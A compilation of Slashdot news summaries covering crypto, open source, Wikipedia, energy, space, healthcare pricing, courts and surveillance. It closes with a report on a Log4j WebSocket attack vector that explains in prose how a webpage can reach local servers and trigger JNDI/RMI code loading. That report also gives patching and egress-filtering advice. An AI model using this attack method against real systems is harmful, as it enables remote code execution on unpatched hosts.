RadioShack.com is now showing visitors a new message: "Bringing cryptocurrency to the mainstream..."

With a 100-year-old brand, "we are going to lead the way for blockchain tech to reach mainstream adoption by other large brands."

The RadioShack home page says they'll start with a "symbiosis" with Atlas USV, a community-driven project to build a universal, decentralized/widely accessible DeFi base layer. Atlas USV's "Barter" mechanism lets users purchase third-party tokens and transfer them to Atlas USV's treasury in return for discounted USV tokens. "The Atlas USV treasury can accumulate any crypto asset of its choice with this dynamic...

"Once the liquidity pool surpasses other exchanges' liquidity level in any token pair, our swap efficiency will be unbeatable for that pair...

"Other decentralized exchanges margins on swap fees are our opportunity.... "

Or, as they explain on a more detailed web page, "We intend RadioShack to be the first protocol to pass over into mainstream usage in the history of DeFI," promising that RadioShack DeFi "will become the first to market with a 100 year old brand name that's recognized in virtually all 190+ countries in the world..."

"RadioShack has one objective: Distribution and usage by millions of individuals but possibly more important, by hundreds of blue-chip, large corporations as their gateway into becoming blockchain companies."

Currently there's a sign-up form for a notification when "RADIO token" launches (as well as links to their channels on Discord and Telegram).

Their "Fundamentals" page explains that "It is our hypothesis that the best way for crypto to be more mainstream is for an established brand name in the tech space to lead the way."

The RadioShack brand was purchased In November of 2020 by e-commerce rehabilitator REV, now listed as a collaborator on RadioShack's home page. (Ironically, the "Fundamentals" page also includes RadioShack's Super Bowl ad where there store is taken back by the 1980s.)

The official Twitter feed of Radio Shack now also has the same new tagline: "Bringing Cryptocurrency To The Mainstream."

The Log4Shell exploit "exposes how a vulnerability in a seemingly simple bit of infrastructure code can threaten the security of banks, tech companies, governments, and pretty much any other kind of organization," writes VentureBeat. But the incident also raises some questions: Should large deep-pocketed companies besides Google, which always seems to be heavily involved in such matters, be doing more to support the cause with people and resources?
Long-time Slashdot reader frank_adrian314159 shares a related article from a programming author on Dev.To, who'd read hot takes like "Open source needs to grow the hell up." and "Open source' is broken". [T]he log4j developers had this massive security issue dumped in their laps, with the expectation that they were supposed to fix it. How did that happen? How did a group of smart, hard-working people get roped into a thankless, high-pressure situation with absolutely no upside for themselves...?

It is this communal mythology I want to talk about, this great open source brainwashing that makes maintainers feel like they need to go above and beyond publishing source code under an open source license — that they need to manage and grow a community, accept contributions, fix issues, follow vulnerability disclosure best practices, and many other things...

In reality what is happening, is that open source maintainers are effectively unpaid outsourcing teams for giant corporations.
The log4j exploit was first reported by an engineer at Alibaba — a corporation with a market capitalization of $348 billion — so the article wonders what would happen if log4j's team had sent back a bill for the time they'd spend fixing the bug.

Some additional opinions (via the "This Week in Programming" column):

• PuTTY maintainer Andrew Ducker: "The internet (and many large companies) are dependent on software maintained by people in their spare time, for free. This may not be sustainable."

• Filippo Valsorda, a Go team member at Google: "The role of Open Source maintainer has failed to mature from a hobby into a proper profession... The status quo is unsustainable.... GitHub Sponsors and Patreon are a nice way to show gratitude, but they are an extremely unserious compensation structure."

Valsorda hopes to eventually see "a whole career path with an onramp for junior maintainers, including training, like a real profession."

Slashdot reader sciencehabit writes: Think search and rescue animal, and you're likely to picture a dog in an orange vest. But a Tanzanian nonprofit wants you to imagine something else: the African giant pouched rat. Donna Kean and her colleagues at APOPO, a nonprofit that trains pouched rats to save lives, have spent the past 2 decades working with the curious animals (Cricetomys ansorgei) to sniff out tuberculosis and track down land mines. Now, they're moving on to search and rescue.

Science caught up with Kean to chat about the new project, known as RescueRats. Topics include, just how to train a rat, what advantages they have over dogs, and whether people would be freaked out about a rodent coming to save them.

The Wikimedia Foundation banned seven high-level users in September and temporarily demoted a dozen others for abuses "unprecedented in scope and nature." Slashdot reader harrymcc explains: The foundation accused these volunteers of biasing it in favor of the Chinese government's viewpoint. This incident involves beatings, doxxings, and harassment designed to ensure pro-Beijing content.
harrymcc is also technology editor at Fast Company, which got more details from Wikimedia's VP of of Community Resilience & Sustainability, Maggie Dennis: Dennis said a monthlong investigation found that the veteran editors were "coordinating to bias the encyclopedia and bias positions of authority" around a pro-Beijing viewpoint, in part by meddling in administrator elections and threatening, and even physically assaulting, other volunteers...

Wikipedians in China have it especially hard, because the government blocks the site and makes accessing it a crime... But as with the dedicated mainland users of blocked apps like Instagram, Telegram, and Twitter, the prohibition hasn't deterred hundreds of volunteers, who tunnel through the Great Firewall with VPNs, and now make up a small but die-hard part of the Chinese Wikipedia community. Despite China's blockade, the site remains one of the ten most active language versions of Wikipedia, thanks largely to growing numbers of editors based in Taiwan and Hong Kong...

[A]mid acute worries over China's influence in both places, the community's mix of users and viewpoints has grown increasingly combustible. In 2014, when mainland editors were in the majority, there were few references to the Hong Kong protests; more recently, swarms of "pro Beijing" editors and "pro democracy" editors have battled over how exactly to depict those and simliar events. Were the students at a particular rally in Hong Kong protesters or were they rioters? Is a state-backed news outlet a reliable source?

In some cases, the Foundation found, the fights had spread beyond online harassment into real-life threats, and worse... Dennis says there is no evidence the banned editors were backed by the government...

[U]ntil September, the Foundation had only issued 86 bans since 2012, and typically only one at a time. Suddenly, the Foundation's bans and penalties had knocked out a third of the Chinese edition's administrators.
China "is home to the world's largest population of internet users and to the world's most sophisticated apparatus for policing them," the article notes.

It argues that the banned users "liked to defend Beijing's point of view, but they also liked their influence over the Wiki community; and a pro-China stance allowed them to more easily fly under the government's radar. To protect their fiefdom, they sometimes resorted to personal threats, harassment, and assault." Since the ban, they've now launched a "hard fork" of Chinese Wikipedia which already has 400,000 articles, "tailored to appease government censors so that anyone on the mainland can access it."

The article also explores the possibility of having one global version of Wikipedia, rather than separate local editions.

Slashdot reader SoftwareArtist shares an announcement from a Stanford University institute for environmental studies. "For some, visions of a future powered by clean, renewable energy are clouded by fears of blackouts driven by intermittent electricity supplies," the announcement begins.

"Those fears are misplaced, according to a new Stanford University study that analyzes grid stability under multiple scenarios in which wind, water and solar energy resources power 100% of U.S. energy needs for all purposes." "This study is the first to examine grid stability in all U.S. grid regions and many individual states after electrifying all energy and providing the electricity with only energy that is both clean and renewable," said study lead author Mark Z. Jacobson, a professor of civil and environmental engineering at Stanford... Imagine all cars and trucks were powered with electric motors or hydrogen fuel cells, electric heat pumps replaced gas furnaces and water heaters and wind turbines and solar panels replaced coal and natural gas power plants. The study envisions those and many more transitions in place across the electricity, transportation, buildings and industrial sectors in the years 2050 and 2051...

Interconnecting larger and larger geographic regions made power supply smoother and costs lower because it upped the chances of available wind, sun and hydro power availability and reduced the need for extra wind turbines, solar panels and batteries. A significant finding of the study was that long-duration batteries were neither needed nor helpful for keeping the grid stable. Instead, grid stability could be obtained by linking together currently available batteries with storage durations of four hours or less. Linking together short-duration batteries can provide long-term storage when they are used in succession. They can also be discharged simultaneously to meet heavy peaks in demand for short periods. In other words, short-duration batteries can be used for both big peaks in demand for short periods and lower peaks for a long period or anything in-between.
Other findings:

• Cleaner air would spare about 53,200 people from pollution-related deaths every year. It would also spare millions more from pollution-related illnesses. Total estimated health costs saved each year: $700 billion.
• Building and operating a completely renewable grid may create 4.7 million long-term jobs.

• Per capita household energy costs were nearly 63% less.

• New electricity generators would occupy about 0.84% of U.S. land (versus roughly 1.3% occupied today by the fossil fuel industry).

"What do astronomers eat for breakfast on the day that their $10 billion telescope launches into space?" asks the New York Times. "Their fingernails."

The worst-case scenario is "You work for years and it all goes up in a puff of smoke," they're told by Marcia Rieke of the University of Arizona: Dr. Rieke admits her fingers will be crossed on the morning of December 24 when she tunes in for the launch of the James Webb Space Telescope. For 20 years, she has been working to design and build an ultrasensitive infrared camera that will live aboard the spacecraft. The Webb is the vaunted bigger and more powerful successor to the Hubble Space Telescope. Astronomers expect that it will pierce a dark curtain of ignorance and supposition about the early days of the universe, and allow them to snoop on nearby exoplanets.

After $10 billion and years of delays, the telescope is finally scheduled to lift off from a European launch site in French Guiana on its way to a point a million miles on the other side of the moon... [T]here is plenty to be anxious about. The Ariane 5 rocket that is carrying the spacecraft has seldom failed to deliver its payloads to orbit. But even if it survives the launch, the telescope will have a long way to go. Over the following month it will have to execute a series of maneuvers with 344 "single points of failure" in order to unfurl its big golden mirror and deploy five thin layers of a giant plastic sunscreen that will keep the telescope and its instruments in the cold and dark. Engineers and astronomers call this interval six months of high anxiety because there is no prospect of any human or robotic intervention or rescue should something go wrong.

But if all those steps succeed, what astronomers see through that telescope could change everything. They hope to spot the first stars and galaxies emerging from the primordial fog when the universe was only 100 million years or so old, in short the first steps out of the big bang toward the cozy light show we inhabit today.
Tod Lauer, an astronomer at NOIRLab in Tucson, Arizona, remembers the launch of the original Hubble Space Telescope — and told the Times that astronomers had to trust their colleagues in rocket and spacecraft engineering to get it right.

"Someone who knows how to fly a $10 billion spacecraft on a precision trajectory is not going to be impressed by an astronomer, who never took an engineering course in his life, cowering behind his laptop watching the launch," Dr. Lauer said. "You feel admiration and empathy for those people, and try to act worthy of the incredible gift that they are bringing to world."

On Friday the manufacturer of the rocket carrying the teescope tweeted an update. "Target launch date is December 24 at 12:20 am UTC," and confirmed it again on Saturday...

"Ridiculous, seemingly arbitrary price markups are a defining characteristic of the $4-trillion U.S. healthcare system — and a key reason Americans pay more for treatment than anyone else in the world," writes a business columnist for the Los Angeles Times.

"But to see price hikes of as much as 675% being imposed in real time, automatically, by a hospital's computer system still takes your breath away."

Long-time Slashdot reader fahrbot-bot quotes their report: I got to view this for myself after a former operating-room nurse at Scripps Memorial Hospital in Encinitas shared with me screenshots of the facility's electronic health record system.... What they show are price hikes ranging from 575% to 675% being automatically generated by the hospital's software. The eye-popping increases are so routine, apparently, the software even displays the formula it uses to convert reasonable medical costs to billed amounts that are much, much higher. For example, one screenshot is for sutures — that is, medical thread, a.k.a. stitches. Scripps' system put the basic "cost per unit" at $19.30. But the system said the "computed charge per unit" was $149.58. This is how much the patient and his or her insurer would be billed.

The system helpfully included a formula for reaching this amount: "$149.58 = $19.30 + ($19.30 x 675%)."

You read that right. Scripps' automated system took the actual cost of sutures, imposed an apparently preset 675% markup and produced a billed amount that was orders of magnitude higher than the true price. This is separate from any additional charges for the doctor, anesthesiologist, X-rays or hospital facilities.

Call it institutionalized price gouging. And it's apparently widespread because the same or similar software is used by other hospitals nationwide, including UCLA, and around the world... Healthcare providers routinely ignore the actual cost of treatment when calculating bills and instead cook up nonsensical figures to push reimbursement from insurers higher. For the millions of people without health insurance, those sky-high prices are what they're stuck with (although most hospitals, including Scripps, typically will offer discounts in such circumstances).

Long-time Slashdot reader kjshark writes: Eric Clapton has successfully sued a German woman who posted an illegal recording for €9.95, about $11 on eBay. The CD was a single-bootlegged recording of a Clapton concert from the 1980s.

After Clapton sent a court in Düsseldorf an affidavit stating the recordings were illegal, the defendant claimed she was unaware the CD was recorded illegally and that her late husband originally purchased the CD at a department store in 1987. Her appeal was rejected by the court.

The court ruled that the woman pay the legal fees for both parties which amount to around $3,500 and that if she continues to keep the recording up on eBay she'll face six months in prison or a fine of around $283,000.

"Both sides made closing arguments this week in Theranos founder Elizabeth Holmes' fraud trial," reports Business Insider: Prosecutors said Holmes "chose to be dishonest" and that her allegations of abuse, which were a key part of her defense, were irrelevant. The defense said "rats flee a sinking ship" but Holmes stayed, noting "that's who that woman is...."

Prosecutors kicked off their arguments by recapping testimony from each of their 29 witnesses. They argued that Holmes saw money dry up at Theranos while its progress languished and had to decide whether to "watch Theranos slowly fail" or defraud investors and patients. "She chose fraud over business failure. She chose to be dishonest," said Assistant US attorney Jeffrey Schenk, according to NBC News. "That choice was not only callous, it was criminal."

Prosecutors revisited Holmes' bombshell admissions during her seven days of testimony, including that she added pharmaceutical companies' logos to validation reports without authorization and kept Theranos' use of modified third-party devices a secret. Holmes has said she wanted to convey that the reports were the result of work done with those pharmaceutical companies and that she withheld information about the use of commercial devices because it was a trade secret.
The New York Times argues historians will see the trial as "a case study in the use of clothing to affect opinion (public and judicial) and, if not to make friends, at least to influence people. Or try to." When the verdict comes down, the transformation of the wunderkind founder of Theranos from black-clad genius to besuited milquetoast will be an integral part of the story. Did it work, or was it a seemingly transparent effort to play the relatable card? Rarely has there been as stark an example of Before and After.... Gone were her signature black turtlenecks and black slacks; gone the bright red lipstick and blond hair ironed straight as a board or pulled into a chignon.... Instead there was ... sartorial neutrality, in the form of a light gray pantsuit and light blue button-down shirt, worn untucked, with baby pink lipstick. She looked more like the college student trying on a grown-up interview look than the mastermind of a multimillion-dollar fraud scheme.... There was not a power heel or a power shoulder in sight. The only part of her outfit that was branded in any way was her diaper bag backpack (her son was born in July), which was from Freshly Picked and costs around $175...

The net effect of Ms. Holmes's makeover was middle manager or backup secretarial character in a streaming series about masters of the universe (but not her! uh-uh), with the diaper bag functioning as an implicit reminder of her maternal status and family values. In case that accessory wasn't enough, she often entered the courthouse with an actual family member — her mother, her partner — in tow, and a hand to cling to. It was code-switching of the most skillful kind. It was relatable. One of the stereotypes of Silicon Valley's superstars, after all, is that they are other: speaking in bits, relating to machines more than people; living, literally, in a different reality. When you want a jury to sympathize with your plight, you have to make them imagine themselves in your shoes. Which means, you need to look, if not like them, at least like someone they might know.

The Free Software Foundation's board "has approved and implemented two new measures designed to help make FSF governance more transparent, accountable, ethical, and responsible," according to an FSF announcement.

First a Board Member Agreement "enumerates the responsibilities of board members." And there's also a Code of Ethics "that lays out principles to guide their decision-making and activities." The new measures are the first products of a six-month, consultant-led review. They formalize crucial aspects of the FSF's governance, and will guide board members to understand and embrace their responsibilities to the nonprofit's worldwide mission to promote computer user freedom.

The new Board Member Agreement spells out nineteen duties and responsibilities, including minimum expectations for organizational and financial oversight, participation in board activities, the recruitment of associate members, and annual performance reviews. The Code of Ethics details thirteen specific provisions establishing how the board of directors will conduct the business affairs of the organization in good faith and with honesty, integrity, due diligence, and competence.

All current board members have signed and committed to upholding the new governance standards.
The agreement clarifies that Board members "do not have individual direct authority over FSF staff. Individual board members will not try to give staff instructions about what to do in their FSF work, nor try to pressure them about what to do." Board members also agree not to participate in discussions and votes where they might have a conflict of interest.

"In signing this document, I understand that no quotas are being set, that no rigid standards of measurement or achievement are being formed. I have confidence that other board members will operate in good faith to carry out these agreements to the best of their ability."

"The FSF has always been a steady beacon for freedom and against the widespread mistreatment of computer users," says FSF president Geoffrey Knauth in the announcement. "In the last year, the board realized that we faced a challenge and opportunity to improve our governance practices and recruit new leaders to the FSF board. I'm proud of this important step in that ongoing work."

An anonymous reader quotes a report from ProPublica: Across the country, some law enforcement agencies have deployed controversial surveillance technology to track cellphone location and use. Critics say it threatens constitutional rights, and members of Congress have moved to restrain its use. Nonetheless, in 2019 the Boston Police Department bought the device known as a cell site simulator -- and tapped a hidden pot of money that kept the purchase out of the public eye. A WBUR investigation with ProPublica found elected officials and the public were largely kept in the dark when Boston police spent $627,000 on this equipment by dipping into money seized in connection with alleged crimes.

Also known as a "stingray," the cell site simulator purchased by Boston police acts like a commercial cellphone tower, tricking nearby phones into connecting to it. Once the phones connect to the cell site simulator's decoy signal, the equipment secretly obtains location and other potentially identifying information. It can pinpoint someone's location down to a particular room of a hotel or house. While this briefcase-sized device can help locate a suspect or a missing person, it can also scoop up information from other phones in the vicinity, including yours. The Boston police bought its simulator device using money that is typically taken during drug investigations through what's called civil asset forfeiture.

An August investigation by WBUR and ProPublica found that even if no criminal charges are brought, law enforcement almost always keeps the money and has few limitations on how it's spent. Some departments benefit from both state and federal civil asset forfeiture. The police chiefs in Massachusetts have discretion over the money, and the public has virtually no way of knowing how the funds are used. The Boston City Council reviews the BPD annual budget, scrutinizing proposed spending. But the surveillance equipment wasn't part of the budget. Because it was purchased with civil forfeiture funds, BPD was able to circumvent the council. According to an invoice obtained by WBUR, the only city review of the purchase -- which was made with federal forfeiture funds -- came from the Procurement Department, confirming that the funds were available. In fact, it was only after sifting through hundreds of documents received through public records requests that WBUR discovered BPD had bought the device from North Carolina-based Tactical Support Equipment Inc., which specializes in surveillance technology.

H&R Block filed a trademark infringement lawsuit over Square's new name, "Block" on Thursday. CNBC reports: The tax preparation service seeks to keep Block from using the new name, saying in a press release that the fintech company "would improperly capitalize on the goodwill and consumer trust cultivated by Block since 1955." H&R Block said the renamed company competes with it directly in financial services, including through its recent acquisition of Credit Karma Tax for tax preparation. It alleged the name would be overly confusing for consumers, especially given the two companies' overlapping offerings. "Today's filing is an important effort to prevent consumer confusion and ensure a competitor cannot leverage the reputation and trust we have built over more than six decades," said H&R Block President and CEO Jeff Jones said in a statement.

A long and strikingly critical article that reviews the state of the Russian space program was published in the state-aligned newspaper MK this week. This article was written by Dmitry Popov, who has worked at the publication since 1992. Ars Technica reports: The article, translated for Ars by Rob Mitchell, is titled "The Space Program Is Rotting from Within." It begins with the declaration that Russia's space program has a shortage of competent and highly qualified staff, obsolete facilities and technology, and "systemic leadership weakness." And that's just the opening paragraph. Popov goes on to state that Russian space companies are delinquent on promised deliveries for hundreds of contracts. For example, the Khrunichev Center agreed to deliver 10 booster cores for the Angara A5 rocket five years ago. The first five cores were delivered only in March of this year, and the other five are not yet completed. [...] Popov said Roscosmos is struggling even to build its mainstay vehicles, the Soyuz rockets and Progress spacecraft. Consider a recent docking issue with the Progress vehicle, which carries supplies to the Russian segment of the International Space Station.

Popov further expressed concern about reliance on Germany to help fuel the Soyuz rocket and the Soyuz spacecraft that launches humans. The issue is that vernier thrusters on the Soyuz boosters and in the de-orbit engines of the Soyuz-MS spacecraft use a special grade of highly refined hydrogen peroxide. Production of this hydrogen peroxide in Russia, however, depends on deliveries of chemicals produced by a German company called Evonik Resource Efficiency GmbH. These deliveries are subject to limitation by international sanctions against the Russian Federation. "That is, the West can stop Russian space launches with a single keystroke," Popov wrote.

The article also discusses the Vostochny Cosmodrome, a spaceport in eastern Russia that has been a priority for President Vladimir Putin. However this project, under Rogozin's stewardship, has been beset by construction delays and corruption, such as embezzlement. Of the nearly 1,200 structures planned for construction at the spaceport, only about 200 have been completed, Popov wrote. Construction has yet to begin on more than 40 percent of them. Already, the planned launch of Angara A5 rockets from Vostochny has been delayed from 2021 to 2023, as criminal investigations continue. Popov then turns to Russia's so-called Moon program, which requires development of the Oryol, or "Eagle," spacecraft to fly cosmonauts into deep space. This vehicle was intended to both replace the Soyuz for transporting cosmonauts to the International Space Station and to form part of the lunar program. But aside from that, everything is going swell with Russia's Moon program.

Popov also criticizes Rogozin for over-promising on Russian launch efficiency and under-delivering. For example, Roscosmos said there would be 44 space launches in 2019, and 25 were conducted. In 2020, 40 launches were planned and just 17 conducted. This year, Russia has conducted fewer than half of its planned 47 launches. Roscosmos, therefore, has decided to no longer publish its planned number of launches. The overall portrait Popov paints of Roscosmos is that of a wasteful, increasingly decrepit enterprise where almost no money is being invested into the present or future. Instead, the focus seems to be providing high-paying jobs for a handful of technocrats, whose salaries are worth hundreds of thousands of dollars a year. Meanwhile, the average monthly wages for technical specialists who build the country's rockets and spacecraft range from $500 to $1,000 a month.

An anonymous reader quotes a report from Reuters: Climate change, the rapid growth of "stablecoins" and financial innovations that led to frenzied trading of GameStop shares early this year are threats to the U.S. financial system that merit closer scrutiny, a Treasury Department-led regulatory panel said on Friday. In its annual report, the Financial Stability Oversight Council (FSOC) added that while the U.S. economy has improved since the onset of the COVID-19 pandemic, risks to the financial system are higher than prior to the health crisis, with the outlook for global growth still uncertain.

The report marked the first time the body, which was created in the wake of the 2007-2009 financial crisis to spot looming threats, has flagged climate change as a major risk, reflecting President Joe Biden's push to address rising global temperatures. The FSOC, which comprises the Treasury and other financial regulators, said the physical risks posed by more frequent severe weather events and government policies transitioning away from carbon-heavy industry could dent asset values and weaken institutions, it wrote, echoing an October FSOC paper. "If these changes occur in a disorderly way owing to substantial delays in action or abrupt changes in policy, their impact is likely to be more sudden and disruptive," the FSOC said.

Similarly, the body reiterated concerns flagged in November that stablecoins, a fast-growing type of digital asset pegged to traditional currencies, could become a threat if widely adopted. While that market is currently only worth about $127 billion, its market value has ballooned more than 500% over the past 12 months and may be vulnerable to runs if investors lose confidence in the asset class's reliability, the FSOC said. The body also noted a surge of volatility earlier this year sparked by retail investors, who coordinated on social media and used zero-commission trading apps to fuel sharp rises in a handful of stocks, including videogame maker GameStop. The episode suggested financial innovations and social media are changing market participation, raising the risk of sudden asset price movements unrelated to fundamental news. That "could represent a vulnerability if they lead to cascading impacts by causing asset liquidations or putting stress on financial institutions," the FSOC wrote.

Previously, one assumption about the 10 out of 10 Log4j security vulnerability was that it was limited to exposed vulnerable servers. We were wrong. The security company Blumira claims to have found a new, exciting Log4j attack vector. ZDNet reports: According to Blumira, this newly-discovered Javascript WebSocket attack vector can be exploited through the path of a listening server on their machine or local network. An attacker can simply navigate to a website and trigger the vulnerability. Adding insult to injury, WebSocket connections within the host can be difficult to gain deep visibility into. That means it's even harder to detect this vulnerability and attacks using it. This vector significantly expands the attack surface. How much so? It can be used on services running as localhost, which are not exposed to a network. This is what we like to call a "Shoot me now" kind of problem. Oh, and did I mention? The client itself has no direct control over WebSocket connections. They can silently start when a webpage loads. Don't you love the word "silently" in this context? I know I do.

In their proof-of-concept attack, Blumira found that by using one of the many Java Naming and Directory Interface (JNDI) exploits that they could trigger via a file path URL using a WebSocket connection to machines with an installed vulnerable Log4j2 library. All that was needed to trigger success was a path request that was started on the web page load. Simple, but deadly. Making matters worse, it doesn't need to be localhost. WebSockets allow for connections to any IP. Let me repeat, "Any IP" and that includes private IP space.

Next, as the page loads, it will initiate a local WebSocket connection, hit the vulnerable listening server, and connect out over the identified type of connection based on the JNDI connection string. The researchers saw the most success utilizing Java Remote Method Invocation (RMI). default port 1099., although we are often seeing custom ports used. Simply port scanning, a technique already in the WebSocket hacker handbook, was the easiest path to a successful attack. Making detecting such attacks even harder, the company found "specific patterns should not be expected as it is easy to trigger traffic passively in the background." Then, an open port to a local service or a service accessible to the host is found, it can then drop the JNDI exploit string in path or parameters. "When this happens, the vulnerable host calls out to the exploit server, loads the attacker's class, and executes it with java.exe as the parent process." Then the attacker can run whatever he wants. Blumira suggests users "update all local development efforts, internal applications, and internet-facing environments to Log4j 2.16 as soon as possible, before threat actors can weaponize this exploit further," reports ZDNet.

"You should also look closely at your network firewall and egress filtering. [...] In particular, make sure that only certain machines can send out traffic over 53, 389, 636, and 1099 ports. All other ports should be blocked." The report continues: "Finally, since weaponized Log4j applications often attempt to call back home to their masters over random high ports, you should block their access to such ports. "